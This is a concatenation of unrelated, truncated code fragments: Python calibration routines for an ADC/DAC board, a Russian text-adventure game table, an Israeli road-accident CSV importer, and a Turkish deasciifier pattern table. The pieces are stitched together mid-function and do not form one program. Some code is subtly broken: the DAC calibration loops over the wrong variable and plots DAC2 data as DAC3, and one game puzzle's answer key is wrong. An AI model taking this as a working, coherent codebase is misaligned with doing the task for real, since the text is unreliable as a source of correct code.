pl.plot(xcal,ycal3,label="ADC3")
pl.plot(xcal,ycal4,label="ADC4")
pl.xlabel('DAC1 Value') # Set X label
pl.ylabel('ADC 1,2,3,4 Values') # Set Y label
pl.title('ADC Ratiometric Calibration Curves') # Set title
pl.legend(loc='lower right')
pl.grid()
pl.show()
pl.close()
# Save of calibration data
message(1,"Saving calibration data to " + fprefix + calprefix + ADC_CAL_FILE)
with open(fprefix + calprefix + ADC_CAL_FILE,'wb') as f:
pickle.dump([xcal,ycal1,ycal2,ycal3,ycal4], f)
# All calibration tables
adcCalData = [ycal1,ycal2,ycal3,ycal4]
# Restore the number of ADC readings
setDCreadings(lastDCR)
print()
print("Calibration of ADCs completed")
print()
'''
Stores DAC calibration data
Internal function
Parameter:
n : Number of DACs to show
'''
def _storeAndShowDACcalibration(n):
# Plot if we have SciPy
if not scipy:
cannotPlot()
else:
plt.figure(facecolor="white") # White border
pl.plot(dacx,dac1y,label="DAC1") # Show curves
if n >= 2:
pl.plot(dacx,dac2y,label="DAC2")
if n >= 3:
pl.plot(dacx,dac2y,label="DAC3")
pl.xlabel('DAC Value') # Set X label
pl.ylabel('Real Ratiometric Values') # Set Y label
pl.title('DAC Ratiometric Calibration Curves') # Set title
pl.legend(loc='lower right')
pl.grid()
pl.show()
pl.close()
message(1,"Saving calibration data to "+ fprefix + calprefix + DAC_CAL_FILE)
with open(fprefix + calprefix + DAC_CAL_FILE,'wb') as f:
pickle.dump([dacx,dac1y,dac2y,dac3y,dac4y], f)
# All calibration tables
dacCalData = [dac1y,dac2y,dac3y,dac4y]
'''
@dacCalibrate@
dacCalibrate()
Third stage of board calibration
Calibrates DAC(i) against ADC(i)
Stores calibration data on DAC_CAL_FILE file
Returns nothing
Included in slab.py
'''
def dacCalibrate():
global dacx,dac1y,dac2y,dac3y,dac4y,dacCalData
print()
print("Calibration of DACs")
print()
print("Connect the DAC outputs to ADC inputs with same number")
print("DAC 1 to ADC 1 and DAC2 to ADC2 and son on...")
print()
input("Press [Return] to continue")
# Increase number of readings for better calibration
lastDCR=setDCreadings(1000)
# Define input calibration range and steps
# dacx = np.arange(0.0,1.1,0.1)
dacx = []
for x in range(0,11):
dacx.append(x/10.0)
# Output range is now empty
dac1y = []
dac2y = []
dac3y = []
dac4y = []
# Obtain calibration data
# We use previusly calibrated ADC channels
message(1,"Performing DAC calibration")
for x in dacx:
message(2," Calibrate at " + str(x))
writeChannel(1,x) # Set DAC values without calibration
writeChannel(2,x)
if ndacs >= 3:
writeChannel(3,x)
time.sleep(0.1) # Wait a little
a1 = readADC(1) # ADC ratiometric read (with calibration)
a2 = readADC(2)
dac1y.append(a1) # Append read values
dac2y.append(a2)
if ndacs>=3:
a3 = readADC(3)
dac3y.append(a3)
prev1=-1;
# Check monotony
for x,y1,y2,y3,y4 in zip(xcal,dac1y,dac2y,dac3y,dac4y):
if prev1!=-1:
if y1 < prev1:
raise SlabEx("Channel 1 non monotonous")
if y2 < prev2:
raise SlabEx("Channel 2 non monotonous")
if ndacs >= 3 and y3 < prev3:
raise SlabEx("Channel 3 non monotonous")
if ndacs >= 4 and y4 < prev4:
raise SlabEx("Channel 4 non monotonous")
prev1 = y1
prev2 = y2
prev3 = y3
prev4 = y4
# Show and save calibration data
_storeAndShowDACcalibration(ndacs)
# Restore the number of ADC readings
setDCreadings(lastDCR)
print()
print("Calibration of DACs completed")
print()
'''
@manualCalibrateDAC1@
manualCalibrateDAC1()
First stage of board calibration
Performs a manual calibration of DAC 1 against a voltage meter
Also calibrates Vdd and Vref
Returns nothing
Included in slab.py
'''
def manualCalibrateDAC1():
global vdd,vref,dacx,dac1y
print()
print("Manual calibration of DAC 1")
print("You will need a voltage measurement instrument (VM)" )
print()
print("Put VM between the Vdd terminal and GND")
print("Write down the voltage value and press enter")
print()
vdd = float(input("Voltage value [Volt]: "))
print()
print("Put VM between the buffered DAC 1 output and GND")
print("Write down the voltage value and press enter each time it is asked")
print()
# Increase number of readings for better calibration
lastDCR=setDCreadings(1000)
dacx = [0.0,0.02,0.1,0.5,0.9,0.98,1.0]
voltages = []
prevv = -1.0
for x in dacx:
writeChannel(1,x)
y = float(input("Voltage value [Volt]: "))
voltages.append(y)
if y < prevv:
raise SlabEx("Non monotonous. Cannot calibrate")
prevv = y
# Stores vdd and vref calibration
if voltages[3]*2.0 > voltages[6] :
setVref(voltages[3]*2.0, persistent=True)
else:
setVref(voltages[-1], persistent=True)
# Convert to ratiometric
dac1y = []
for v in voltages:
dac1y.append(v/vref)
# Store calibration
_storeAndShowDACcalibration(1)
# Restore the number of ADC readings
setDCreadings(lastDCR)
print()
print("Manual calibration of DAC 1 completed")
print()
'''
@checkCalibration@
checkCalibration()
Fourth and last stage of board calibration
Checks the board calibration
Shows the curves of DACs connected to ADCs
Returns nothing
Included in slab.py
'''
def checkCalibration():
print()
print("Calibration check")
print()
print("Connect the DAC outputs to ADC inputs with same number")
print("DAC 1 to ADC 1 and DAC2 to ADC2 and son on...")
print("Connect the rest of ADCs to DAC 1")
print()
input("Press [Return] to continue")
# Increase number of readings for better calibration
lastDCR=setDCreadings(400)
vmin = 0.1
vmax = vref - 0.1
R1 = dcSweep(1,vmin,vmax,0.2)
R2 = dcSweep(2,vmin,vmax,0.2)
if ndacs > 2:
R3 = dcSweep(3,vmin,vmax,0.2)
x = R1[0]
y1 = R1[1]
y2 = R2[2]
if ndacs > 2:
y3 = R3[3]
else:
y3 = R1[3]
y4 = R1[4]
for i in range(1,ndacs+1):
setVoltage(i,1.0)
message(1,"")
message(1,"DAC outputs shall be now 1V")
message(1,"They will be zero after closing the plot")
message(1,"")
plot1n(x,[y1,y2,y3,y4],"Final curves","DAC (V)","ADC (V)",["Ch1","Ch2","Ch3","Ch4"])
zero()
# Restore the number of ADC readings
setDCreadings(lastDCR)
'''
@dcPrint@
dcPrint()
Show readings all four ADC channels on screen
Returns nothing
Included in slab.py
'''
def dcPrint():
a1 = readVoltage(1);
a2 = readVoltage(2);
a3 = readVoltage(3);
a4 = readVoltage(4);
print("ADC DC Values")
print(" ADC1 = "+"{0:.3f}".format(a1)+" V")
print(" ADC2 = "+"{0:.3f}".format(a2)+" V")
print(" ADC3 = "+"{0:.3f}".format(a3)+" V")
print(" ADC4 = "+"{0:.3f}".format(a4)+" V")
print()
'''
@zero@
zero()
Set all DACs to ratiometric zero
Does not use calibration
Returns nothing
Included in slab.py
'''
def zero():
for i in range(1,ndacs+1):
writeChannel(i,0.0);
message(2,"All DACs at zero")
'''
@dcLive@
dcLive(n,wt,single,returnData)
Prints live values of ADC voltages
Use CTRL+C to exit
Optional | |
######################################################################################################################
# Программа "Заброшенный дом"
# Разработана для ItFest 2021
######################################################################################################################
import random
from enumes import Location, TypeLocation
from texts import TextFinal, TextNotGoodEnd, TextGoodEnd
######################################################################################################################
# Engine Data
# Основное описание локаций, в зависимости от типа локации могут иметь переменную длину списка с параметрами
# {ключ = [тип локации, текст, варианты исхода, данные для квестов (необязательно)]}
# Локация типа place - просто описывает место и предлагает варианты выходов
# Локация типа quest - иемет только один выход, но выйти можно решив только задачу или остаться там умирать с голоду
# Локация типа test - иемет 2 выхода, но выход выбирает не пользователь, а "одноименная" функция (скрипт)
# для упрошщения тело скрипта вынесено из GameData, хотя можно было его вызвать через eval полностью
GameData = {
Location.front_of_house: [
TypeLocation.place,
'''
Вот Я перед домом.
Дом действительно очень старый и не менее страшный.
Дааа, и тут мне придётся ночевать.
Мне нужно решить, что мне делать:
1) Попытаться войти в дом.
2) Обойти дом по кругу.''',
[Location.first_floor_quest, Location.next_house]],
Location.first_floor_quest: [
TypeLocation.quest,
'На двери замок!',
[Location.first_floor], ['Надо вскрыть замок:', '(2 + 3) * 5 - 2 = x', '23', 'x = ']],
Location.next_house: [
TypeLocation.place,
'''
Я нахожусь около дома, под окном на второй этаж.
%rnd%
Тут очень сыро и холодно 🥶.
Я вижу что к окну идут лианы!
Мне нужно решить, что мне делать:
1) Попытаться залезть на второй этаж.
2) Подойти ко входу в дом.''',
[Location.first_room_quest, Location.front_of_house]],
Location.first_room_quest: [
TypeLocation.quest,
'''
Квест: Некоторые лианы засохли!
Надо найти свежие лианы.''',
[Location.first_room_test_inner], ['Найди закономерность!\nВставь вместо пропусков ответ:',
'101100111000____0000', '1111', '____ = ']],
Location.first_floor: [
TypeLocation.place,
'''
Я на первом этаже этого дома.
Надо тут осмотреться, убедиться в безопасности дома, как ночлега. 😴
Ливень снаружи, к сожалению, всё никак не прекращался.
Мне нужно решить, что мне предпринять:
1) Подняться на второй этаж.
2) Посмотреть что есть в подвале.
3) Зайти в комнату похожую на кухню.
4) Выйти из дома.''',
[Location.second_floor_1, Location.basement_test_inner, Location.kitchen_test_slingshot,
Location.front_of_house]],
Location.second_floor_1: [
TypeLocation.place,
'''
Я на втором этаже этого странного дома.
Но тут более приятное место для ночлега.
%rnd%
Надо осмотреть каждую комнату этого этажа.
Мне нужно решить, куда мне пойти:
1) Попытаться зайти в 1-ую комнату.
2) Попытаться зайти во 2-ую комнату.
3) Попытаться зайти в 3-ую комнату вроде "самую уютную".
4) Спуститься на первый этаж.''',
[Location.first_room_test, Location.second_room, Location.final_room_test, Location.first_floor]],
Location.second_floor_2: [
TypeLocation.place,
'''
Второй этаж этого "неблагоприятного" дома.
%rnd%
Мне нужно решить, куда мне пойти:
1) Попытаться зайти в 1-ую комнату.
2) Попытаться зайти во 2-ую комнату.
3) Попытаться зайти в 3-ую комнату вроде "самую уютную".
4) Спуститься на первый этаж.''',
[Location.first_room_test, Location.second_room, Location.final_room_test, Location.first_floor]],
Location.final_room_test: [
TypeLocation.test,
' Здесь замок, для которого нужно 2 ключа!',
[Location.final_room_quest, Location.second_floor_2]],
Location.final_room_quest: [
TypeLocation.quest,
'\tКвест: Осталось подобрать ключи\n\tНадо только узнать как?',
[Location.final_room_test_inner], ['\tДля этого реши систему уравнений:',
'\t2k + x = 1\nk + y = 13\ny + x = 2\n2k = ...', '8', '2k = ']],
Location.first_room_test: [
TypeLocation.test,
' Эта комната заперта с другой стороны!',
[Location.first_room_test_inner, Location.second_floor_2]],
Location.first_room_test_inner: [
TypeLocation.test,
'',
[Location.first_room_2, Location.first_room_quest_open]],
Location.first_room_quest_open: [
TypeLocation.quest,
'''
в этой комнате в первый раз. Она необычная и немного жутковатая!
В большом шкафу Я нашёл мистическую "математическую" шкатулку.
Квест: Хорошо, что Я люблю математику!''',
[Location.first_room_1],
['Откроем её!', 'x = sin(30) * 4', '2', 'x = '],
'Здесь лежит ключ!',
True],
Location.first_room_1: [
TypeLocation.place,
'''
Мне нужно решить, что мне делать:
1) Попытаться слезть по лиане с окна на улицу!
2) Выйти в коридор второго этажа.''',
[Location.next_house, Location.second_floor_1]],
Location.first_room_2: [
TypeLocation.place,
'''
В этой комнате Я уже всё осмотрел и открыл шкатулку.
Зачем я хожу кругами?
%rnd%
Надо действовать быстрее, а то Я здесь буду до утра всё проверять!
Мне нужно решить, что мне делать:
1) Попытаться слезть по лиане с окна на улицу!
2) Выйти в коридор второго этажа.''',
[Location.next_house, Location.second_floor_1]],
Location.second_room: [
TypeLocation.place,
'''
Эта комната открылась довольно дружелюбно.
Комната была небольшая, но здесь была лестница на чердак.
%rnd%
В комнате Я не нашёл ни одной вещи, которая мне могла бы пригодиться.
Тут-же Я заметил, что крыжа протекает, так себе ночлег!
Мне нужно решить, куда идти:
1) Подняться на чердак.
2) Вернуться обратно в коридор.''',
[Location.attic, Location.second_floor_1]],
Location.attic: [
TypeLocation.place,
'''
Пока Я лез на пыльный чердак, наглотался паутины 🕸!
%rnd%
Тут было довольно просторно.
Надо изучить всё пространство.
Мне нужно решить, что мне делать:
1) Спустится обратно, через пауков 🕷.
2) Вылезть через щель в 1-ую комнату.
3) Зайти в дальний конец чердака.''',
[Location.second_room, Location.first_room_test_inner, Location.attic_test_inner]],
Location.attic_test_inner: [
TypeLocation.test,
'',
[Location.attic_down]],
Location.attic_down: [
TypeLocation.place,
'''
В чердаке оказалась "пробоина", Я громко свалился на первый этаж.
Когда пришёл в сознание, всё ужасно болело, мне было страшно.
Хорошо, что Я выжил после такого. Ведь мог бы и не выжить!''',
[Location.first_floor]],
Location.basement_test_inner: [
TypeLocation.test,
'',
[Location.basement_2, Location.basement_quest]],
Location.basement_quest: [
TypeLocation.quest,
'''
Вот я уже в тёмном подвале этого дома.
%rnd%
Тут уж точно место не для ночлега.
Стоп, тут есть какая-то шкатулка.''',
[Location.basement_1],
['Эта шкатулка хитро закрыта, попробую открыть:', '2x + 3 = 3x - 4\nx = ...', '7', 'x = '],
'\tВ шкатулке был ключ! Возьму вдруг пригодиться.',
True],
Location.basement_1: [
TypeLocation.place,
'''
Мне нужно решить, что мне делать дальше:
1) Вернуться в этот дом.
2) Вылезть через маленькое окно в подвале "Попытаться".''',
[Location.first_floor, Location.small_window_quest]],
Location.basement_2: [
TypeLocation.place,
'''
Вот я уже в тёмном подвале этого дома.
%rnd%
Тут уж точно место не для ночлега.
Эту шкатулку я уже видел!
Зачем я хожу кругами?
Мне нужно решить, что мне делать дальше:
1) Вернуться в этот дом.
2) Вылезть через маленькое окно в подвале "Попытаться".''',
[Location.first_floor, Location.small_window_quest]],
Location.small_window_quest: [
TypeLocation.quest,
'''
Ну что-ж, попытка не пытка! Надеюсь)''',
[Location.next_house], ['Надо пролезть, подбери минимальное значение:',
'Минимальное "n" если (n > 16) и (n - чётное число)', '16', 'n = '],
'\tНаконец-то!'], # 'min(n) if n > 14 and n % 2 == 0'
Location.kitchen_test_slingshot: [
TypeLocation.test,
'',
[Location.kitchen_1, Location.kitchen_2]],
Location.kitchen_1: [
TypeLocation.place,
'''
А вспомнил, я тут уже был и взял рогатку, возвращаемся обратно.
''',
[Location.first_floor]],
Location.kitchen_3: [
TypeLocation.place,
'''
Остается только вернуться в хол и поискать ключ.
''',
[Location.first_floor]],
Location.kitchen_4: [
TypeLocation.place,
'''
Ящик открылся, я был сильно напуган увидев череп какого-то лесного животного-хищника,
Ещё тут было много тараканов и пахло не очень. Зато тут была хорошая рогатка.
Она была стальная с бронзовыми шариками-снарядами, ладно возьму с собой.
Тут где-то в доме упала стеклянная ваза. Может это крысы бегают по столам?
Возвращаемся в комнату, тут больше делать нечего.
''',
[Location.first_floor]],
Location.kitchen_2: [
TypeLocation.place,
'''
Я зашёл в комнату, похожую на кухню.
Выглядела она ужасно, везде пахло гноем.
Во всей комнате не было ничего дельного.
Комната была пуста, хоть тут и было много различных шкафов!
Один, кстати, закрыт, может хоть в нём что-то есть!
%rnd%
Похоже придётся возвращаться или ... :
1) Вернуться обратно.
2) Осмотреть шкаф. ''',
[Location.first_floor, Location.kitchen_test_key]],
Location.kitchen_test_key: [
TypeLocation.test,
'''
Упс. Шкаф закрыт! Мне нужен ключ для шкафа.''',
[Location.kitchen_quest, Location.kitchen_3]],
Location.kitchen_quest: [
TypeLocation.quest,
'''
У меня как-раз есть отмычка, придётся потрудиться!''',
[Location.kitchen_4],
['Надо настроить нашу отмычку!', '|(4 * 2 - 6) ** 3 - 3| * 111 = ...', '555', 'Ответ: '],
'',
True],
# ['Надо настроить отмычку под форму замка:"_" - пропуск, а "|" - палочка!',
# 'Замок: ________________________\n | || || ||| | || ', # Не работает!!!
# '_||__||__||___|_|__|', 'Ключик: ____', True],
Location.final_room_test_inner: [
TypeLocation.test,
'',
[Location.final_room_1, Location.final_room_2]],
Location.final_room_1: [
TypeLocation.place,
TextFinal + '''
3) Оглушить ударом снаряда рогатки, и кинуться по лестнице на улицу! (активно - вы нашли рогатку)''',
[Location.end_test_1, Location.end_2, Location.end_3]],
Location.final_room_2: [
TypeLocation.place,
TextFinal + '''
3) [блок] Оглушить ударом снаряда рогатки, и кинуться по лестнице на улицу! (вы не нашли рогатку)''',
[Location.end_test_1, Location.end_2]],
Location.end_2: [
TypeLocation.place,
'''
Я бросился, что есть мочи к выходу! Оно не отставало.
Я вышиб старую дверь ногой и собирался бежать в лес... ''' + TextNotGoodEnd,
[Location.end]],
Location.end_3: [
TypeLocation.place,
'''
Я не знаю как, но я "случайно" попал ему в грудь!
| |
# -*- coding: utf-8 -*-
import glob
import os
import json
from collections import OrderedDict
import itertools
import re
from datetime import datetime
import six
from six import iteritems
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy import or_
from .. import field_names, localization
from ..models import AccidentMarker, Involved, Vehicle
from .. import models
from ..utilities import ItmToWGS84, init_flask, CsvReader, time_delta, decode_hebrew,ImporterUI,truncate_tables
from functools import partial
import logging
failed_dirs = OrderedDict()
CONTENT_ENCODING = 'cp1255'
ACCIDENT_TYPE_REGEX = re.compile(r"Accidents Type (?P<type>\d)")
ACCIDENTS = 'accidents'
CITIES = 'cities'
STREETS = 'streets'
ROADS = "roads"
URBAN_INTERSECTION = 'urban_intersection'
NON_URBAN_INTERSECTION = 'non_urban_intersection'
DICTIONARY = "dictionary"
INVOLVED = "involved"
VEHICLES = "vehicles"
cbs_files = {
ACCIDENTS: "AccData.csv",
URBAN_INTERSECTION: "IntersectUrban.csv",
NON_URBAN_INTERSECTION: "IntersectNonUrban.csv",
STREETS: "DicStreets.csv",
DICTIONARY: "Dictionary.csv",
INVOLVED: "InvData.csv",
VEHICLES: "VehData.csv"
}
coordinates_converter = ItmToWGS84()
app = init_flask()
db = SQLAlchemy(app)
json_dumps = partial(json.dumps, encoding=models.db_encoding) if six.PY2 else json.dumps
def get_street(settlement_sign, street_sign, streets):
"""
extracts the street name using the settlement id and street id
"""
if settlement_sign not in streets:
# Changed to return blank string instead of None for correct presentation (Omer)
return u""
street_name = [decode_hebrew(x[field_names.street_name]) for x in streets[settlement_sign] if
x[field_names.street_sign] == street_sign]
# there should be only one street name, or none if it wasn't found.
return street_name[0] if len(street_name) == 1 else u""
def get_address(accident, streets):
"""
extracts the address of the main street.
tries to build the full address: <street_name> <street_number>, <settlement>,
but might return a partial one if unsuccessful.
"""
street = get_street(accident[field_names.settlement_sign], accident[field_names.street1], streets)
if not street:
return u""
# the home field is invalid if it's empty or if it contains 9999
home = accident[field_names.home] if accident[field_names.home] != 9999 else None
settlement = localization.get_city_name(accident[field_names.settlement_sign])
if not home and not settlement:
return street
if not home and settlement:
return u"{}, {}".format(street, settlement)
if home and not settlement:
return u"{} {}".format(street, home)
return u"{} {}, {}".format(street, home, settlement)
def get_streets(accident, streets):
"""
extracts the streets the accident occurred in.
every accident has a main street and a secondary street.
:return: a tuple containing both streets.
"""
main_street = get_address(accident, streets)
secondary_street = get_street(accident[field_names.settlement_sign], accident[field_names.street2], streets)
return main_street, secondary_street
def get_junction(accident, roads):
"""
extracts the junction from an accident
omerxx: added "km" parameter to the calculation to only show the right junction,
every non-urban accident shows nearest junction with distance and direction
:return: returns the junction or None if it wasn't found
"""
if accident["KM"] is not None and accident[field_names.non_urban_intersection] is None:
min_dist = 100000
key = (), ()
junc_km = 0
for option in roads:
if accident[field_names.road1] == option[0] and abs(accident["KM"]-option[2]) < min_dist:
min_dist = abs(accident["KM"]-option[2])
key = accident[field_names.road1], option[1], option[2]
junc_km = option[2]
junction = roads.get(key, None)
if junction:
if accident["KM"] - junc_km > 0:
direction = u"צפונית" if accident[field_names.road1] % 2 == 0 else u"מזרחית"
else:
direction = u"דרומית" if accident[field_names.road1] % 2 == 0 else u"מערבית"
if abs(float(accident["KM"] - junc_km)/10) >= 1:
string = str(abs(float(accident["KM"])-junc_km)/10) + u" ק״מ " + direction + u" ל" + \
decode_hebrew(junction)
elif 0 < abs(float(accident["KM"] - junc_km)/10) < 1:
string = str(int((abs(float(accident["KM"])-junc_km)/10)*1000)) + u" מטרים " + direction + u" ל" + \
decode_hebrew(junction)
else:
string = decode_hebrew(junction)
return string
else:
return u""
elif accident[field_names.non_urban_intersection] is not None:
key = accident[field_names.road1], accident[field_names.road2], accident["KM"]
junction = roads.get(key, None)
return decode_hebrew(junction) if junction else u""
else:
return u""
def parse_date(accident):
"""
parses an accident's date
"""
year = accident[field_names.accident_year]
month = accident[field_names.accident_month]
day = accident[field_names.accident_day]
'''
hours calculation explanation - The value of the hours is between 1 to 96.
These values represent 15 minutes each that start at 00:00:
1 equals 00:00, 2 equals 00:15, 3 equals 00:30 and so on.
'''
minutes = accident[field_names.accident_hour] * 15 - 15
hours = int(minutes // 60)
minutes %= 60
accident_date = datetime(year, month, day, hours, minutes, 0)
return accident_date
def load_extra_data(accident, streets, roads):
"""
loads more data about the accident
:return: a dictionary containing all the extra fields and their values
:rtype: dict
"""
extra_fields = {}
# if the accident occurred in an urban setting
if bool(accident[field_names.urban_intersection]):
main_street, secondary_street = get_streets(accident, streets)
if main_street:
extra_fields[field_names.street1] = main_street
if secondary_street:
extra_fields[field_names.street2] = secondary_street
# if the accident occurred in a non urban setting (highway, etc')
if bool(accident[field_names.non_urban_intersection]):
junction = get_junction(accident, roads)
if junction:
extra_fields[field_names.junction_name] = junction
# localize static accident values
for field in localization.get_supported_tables():
# if we have a localized field for that particular field, save the field value
# it will be fetched we deserialized
if accident[field] and localization.get_field(field, accident[field]):
extra_fields[field] = accident[field]
return extra_fields
def get_data_value(value):
"""
:returns: value for parameters which are not mandatory in an accident data
OR -1 if the parameter value does not exist
"""
return int(value) if value else -1
def import_accidents(provider_code, accidents, streets, roads, **kwargs):
logging.info("\tReading accident data from '%s'..." % os.path.basename(accidents.name()))
markers = []
for accident in accidents:
if field_names.x_coordinate not in accident or field_names.y_coordinate not in accident:
raise ValueError("Missing x and y coordinates")
if accident[field_names.x_coordinate] and accident[field_names.y_coordinate]:
lng, lat = coordinates_converter.convert(accident[field_names.x_coordinate],
accident[field_names.y_coordinate])
else:
lng, lat = None, None # Must insert everything to avoid foreign key failure
main_street, secondary_street = get_streets(accident, streets)
assert(int(provider_code) == int(accident[field_names.file_type]))
marker = {
"id": int(accident[field_names.id]),
"provider_code": int(provider_code),
"title": "Accident",
"description": json_dumps(load_extra_data(accident, streets, roads)),
"address": get_address(accident, streets),
"latitude": lat,
"longitude": lng,
"subtype": int(accident[field_names.accident_type]),
"severity": int(accident[field_names.accident_severity]),
"created": parse_date(accident),
"locationAccuracy": int(accident[field_names.igun]),
"roadType": int(accident[field_names.road_type]),
"roadShape": int(accident[field_names.road_shape]),
"dayType": int(accident[field_names.day_type]),
"unit": int(accident[field_names.unit]),
"mainStreet": main_street,
"secondaryStreet": secondary_street,
"junction": get_junction(accident, roads),
"one_lane": get_data_value(accident[field_names.one_lane]),
"multi_lane": get_data_value(accident[field_names.multi_lane]),
"speed_limit": get_data_value(accident[field_names.speed_limit]),
"intactness": get_data_value(accident[field_names.intactness]),
"road_width": get_data_value(accident[field_names.road_width]),
"road_sign": get_data_value(accident[field_names.road_sign]),
"road_light": get_data_value(accident[field_names.road_light]),
"road_control": get_data_value(accident[field_names.road_control]),
"weather": get_data_value(accident[field_names.weather]),
"road_surface": get_data_value(accident[field_names.road_surface]),
"road_object": get_data_value(accident[field_names.road_object]),
"object_distance": get_data_value(accident[field_names.object_distance]),
"didnt_cross": get_data_value(accident[field_names.didnt_cross]),
"cross_mode": get_data_value(accident[field_names.cross_mode]),
"cross_location": get_data_value(accident[field_names.cross_location]),
"cross_direction": get_data_value(accident[field_names.cross_direction]),
"road1": get_data_value(accident[field_names.road1]),
"road2": get_data_value(accident[field_names.road2]),
"km": float(accident[field_names.km]) if accident[field_names.km] else None,
"yishuv_symbol": get_data_value(accident[field_names.yishuv_symbol]),
"geo_area": get_data_value(accident[field_names.geo_area]),
"day_night": get_data_value(accident[field_names.day_night]),
"day_in_week": get_data_value(accident[field_names.day_in_week]),
"traffic_light": get_data_value(accident[field_names.traffic_light]),
"region": get_data_value(accident[field_names.region]),
"district": get_data_value(accident[field_names.district]),
"natural_area": get_data_value(accident[field_names.natural_area]),
"minizipali_status": get_data_value(accident[field_names.minizipali_status]),
"yishuv_shape": get_data_value(accident[field_names.yishuv_shape]),
}
markers.append(marker)
return markers
def import_involved(provider_code, involved, **kwargs):
logging.info("\tReading involved data from '%s'..." % os.path.basename(involved.name()))
involved_result = []
for involve in involved:
if not involve[field_names.id]: # skip lines with no accident id
continue
involved_result.append({
"accident_id": int(involve[field_names.id]),
"provider_code": int(provider_code),
"involved_type": int(involve[field_names.involved_type]),
"license_acquiring_date": int(involve[field_names.license_acquiring_date]),
"age_group": int(involve[field_names.age_group]),
"sex": get_data_value(involve[field_names.sex]),
"car_type": get_data_value(involve[field_names.car_type]),
"safety_measures": get_data_value(involve[field_names.safety_measures]),
"home_city": get_data_value(involve[field_names.home_city]),
"injury_severity": get_data_value(involve[field_names.injury_severity]),
"injured_type": get_data_value(involve[field_names.injured_type]),
"Injured_position": get_data_value(involve[field_names.injured_position]),
"population_type": get_data_value(involve[field_names.population_type]),
"home_district": get_data_value(involve[field_names.home_district]),
"home_nafa": get_data_value(involve[field_names.home_nafa]),
"home_area": get_data_value(involve[field_names.home_area]),
"home_municipal_status": get_data_value(involve[field_names.home_municipal_status]),
"home_residence_type": get_data_value(involve[field_names.home_residence_type]),
"hospital_time": get_data_value(involve[field_names.hospital_time]),
"medical_type": get_data_value(involve[field_names.medical_type]),
"release_dest": get_data_value(involve[field_names.release_dest]),
"safety_measures_use": get_data_value(involve[field_names.safety_measures_use]),
"late_deceased": get_data_value(involve[field_names.late_deceased]),
})
return involved_result
def import_vehicles(provider_code, vehicles, **kwargs):
logging.info("\tReading vehicles data from '%s'..." % os.path.basename(vehicles.name()))
vehicles_result = []
for vehicle in vehicles:
vehicles_result.append({
"accident_id": int(vehicle[field_names.id]),
"provider_code": int(provider_code),
"engine_volume": int(vehicle[field_names.engine_volume]),
"manufacturing_year": get_data_value(vehicle[field_names.manufacturing_year]),
"driving_directions": get_data_value(vehicle[field_names.driving_directions]),
"vehicle_status": get_data_value(vehicle[field_names.vehicle_status]),
"vehicle_attribution": get_data_value(vehicle[field_names.vehicle_attribution]),
"vehicle_type": get_data_value(vehicle[field_names.vehicle_type]),
"seats": get_data_value(vehicle[field_names.seats]),
"total_weight": get_data_value(vehicle[field_names.total_weight]),
})
return vehicles_result
def get_files(directory):
for name, filename in iteritems(cbs_files):
if name not in (STREETS, NON_URBAN_INTERSECTION, ACCIDENTS, INVOLVED, VEHICLES):
continue
files = [path for path in os.listdir(directory)
if filename.lower() in path.lower()]
amount = len(files)
if amount == 0:
raise ValueError("Not found: '%s'" % filename)
if amount > 1:
raise ValueError("Ambiguous: '%s'" % filename)
csv = CsvReader(os.path.join(directory, files[0]), encoding="cp1255")
if name == STREETS:
streets_map = {}
for settlement in itertools.groupby(csv, lambda street: street.get(field_names.settlement, "OTHER")):
key, val = tuple(settlement)
streets_map[key] = [{field_names.street_sign: x[field_names.street_sign],
field_names.street_name: x[field_names.street_name]} for x in val if
field_names.street_name in x and field_names.street_sign in x]
csv.close()
yield name, streets_map
elif name == NON_URBAN_INTERSECTION:
roads = {(x[field_names.road1], x[field_names.road2], x["KM"]): x[field_names.junction_name] for x in csv if
field_names.road1 in x and field_names.road2 in x}
csv.close()
yield ROADS, roads
elif name in (ACCIDENTS, INVOLVED, VEHICLES):
yield name, csv
def chunks(l, n, xrange):
"""Yield successive n-sized chunks from l."""
for i in xrange(0, len(l), n):
yield l[i:i + n]
def import_to_datastore(directory, provider_code, batch_size):
"""
goes through all the files in a given directory, parses and commits them
"""
try: xrange
except NameError:
xrange = range
try:
assert batch_size > 0
files_from_cbs = dict(get_files(directory))
if len(files_from_cbs) == 0:
return 0
logging.info("Importing '{}'".format(directory))
started = datetime.now()
new_items = 0
all_existing_accidents_ids = set(map(lambda x: x[0], db.session.query(AccidentMarker.id).all()))
accidents = import_accidents(provider_code=provider_code, **files_from_cbs)
accidents = [accident for accident in accidents if accident['id'] not in all_existing_accidents_ids]
new_items += len(accidents)
for accidents_chunk in chunks(accidents, batch_size, xrange):
db.session.bulk_insert_mappings(AccidentMarker, accidents_chunk)
all_involved_accident_ids = set(map(lambda x: x[0], db.session.query(Involved.accident_id).all()))
involved = import_involved(provider_code=provider_code, **files_from_cbs)
involved = [x for x in involved if x['accident_id'] not in all_involved_accident_ids]
for involved_chunk in chunks(involved, | |
"Xampi": 3160, " iXb": 3161, " koX": 3162,
" Xub": 3163, "Xart": 3164, "IXik": 3165, "aXir": 3166, " iXte ": 3167,
" baXin ": -3168, "reXm": -3169, "OnUX": 3170, "uXa": 3171, "Xci": 3172,
"aXki": -3173, "Xyo": -3174, "Xeh": 3175, "Xal": -3176, " aXa": 3177,
"eXit": 3178, "miXt": 3179, "Xekil": 3180, "ruluX": 3181, " giriX": 3182,
"brIX": -3183, " beX": 3184, " Xu ": 3185, "daX": 3186, " kIX": -3187,
"muX ": 3188, "Xirke": 3189, "Xoyle ": 3190, " iX ": 3191, " taXi": 3192,
" Xey": 3193, "GiX": 3194, " gOrUX": 3195, "laX": 3196, "Ximdi": 3197,
"dIX": 3198, "IXi": -3199, "liXk": 3200, " yaX": 3201, "aX ": 3202,
" kiXi": 3203, "iXle": 3204, "uXtu": 3205, "miX ": 3206, " dUX": 3207,
" karXi": 3208, "Xtir": 3209, "Xm": 3210, "IX": 3211, "baX": 3212, "X": -3213},
u'u': {"Xctugu": -1, " ay sX": 2, "fXtur ": 3, "Xysuz ": -4,
"Gi rXs": -5, "an Xnv": 6, "Xldeni": -7, "dIn Xn": 8, "i kXcu": 9,
"43 sX ": 10, "Xcunda": -11, "g kulX": 12, " aC kX": -13, "Xrunda": -14,
"lI tXt": -15, "pon bX": 16, "ok bXy": 17, "z abdX": -18, "mamXlu": -19,
"Xllah ": -20, "im sXl": 21, "ne gXn": 22, "Xstafa": -23, " en bX": 24,
"bXlet": 25, "CustX": 26, "ep lX": 27, "Us yX": 28, "as X ": 29,
